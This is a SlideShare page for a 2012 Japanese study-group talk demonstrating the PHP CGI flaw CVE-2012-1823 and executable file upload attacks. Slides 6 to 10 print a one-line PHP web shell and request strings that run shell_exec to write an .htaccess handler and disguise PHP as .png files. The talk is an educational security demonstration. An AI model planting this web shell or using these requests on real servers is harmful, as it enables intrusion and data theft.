Demonstration of Executable File Upload Attack

815 views

Published on

2012年5月26日(土)開催、okayama-js 第3回勉強会にてセッション。
CGI版PHPのリモートスクリプト実行の脆弱性(CVE-2012-1823)と、アップロードファイルによるサーバサイドスクリプト実行のデモを行った。

Published in: Technology, Design
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
815
On SlideShare
0
From Embeds
0
Number of Embeds
8
Actions
Shares
0
Downloads
1
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Demonstration of Executable File Upload Attack

  1. 1. okayama-js, Vol.3 demonstration of executable file upload attack
  2. 2. Copyright © 2843 all rights reserved. 今日のテーマは「セキュリティ」
  3. 3. CVE-2012-1823 Copyright © 2843 all rights reserved. PHPをCGIモードで動作させている場合、 遠隔の第三者がPHPスクリプトのソースコードを 閲覧したり、Webサーバの権限で任意のコードを 実行したりする可能性 demo
  4. 4. アップロードファイルによる サーバサイドスクリプト実行 Copyright © 2843 all rights reserved. 第三者によるファイルアップロードが許可されている場合、 サーバ側で実行可能なファイルがアップロードされると、 Webサーバの権限で任意のコードを実行したりする可能性 demo
  5. 5. Copyright © 2843 all rights reserved. 健全な plug-in upload失敗 upload成功
  6. 6. 脆弱性のある plug-in Copyright © 2843 all rights reserved. upload成功 upload成功 <?=($_GET[1]($_GET[2]))?>
  7. 7. Copyright © 2843 all rights reserved. evil.php?1=shell_exec&2=echo%20AddHandler%20application/x- httpd-php%20.png%20>%20.htaccess;mv%20evil.php%20evil.png; evil.php
  8. 8. Copyright © 2843 all rights reserved. • PHPファイルを画像ファイルへリネーム • .htaccess作成 AddHandler application/x-httpd-php .png .htaccess evil.png
  9. 9. Copyright © 2843 all rights reserved. .htaccess evil.png evil.png?1=shell_exec& 2=echo%20"<?php%20phpinfo();%20?>"%20>%20hoge.png
  10. 10. Copyright © 2843 all rights reserved. .htaccess evil.png <?php phpinfo(); ?> hoge.png
  11. 11. Copyright © 2843 all rights reserved. .htaccess evil.png hoge.png サーバ情報の漏洩
  12. 12. Copyright © 2843 all rights reserved. • 情報漏洩 • ファイル改竄 • 他サーバへの攻撃 • マルウェア感染 • 任意のスクリプトの実行
  13. 13. Copyright © 2843 all rights reserved. Thank you for your attention. ohtsuki2843 ohtsuki2843

×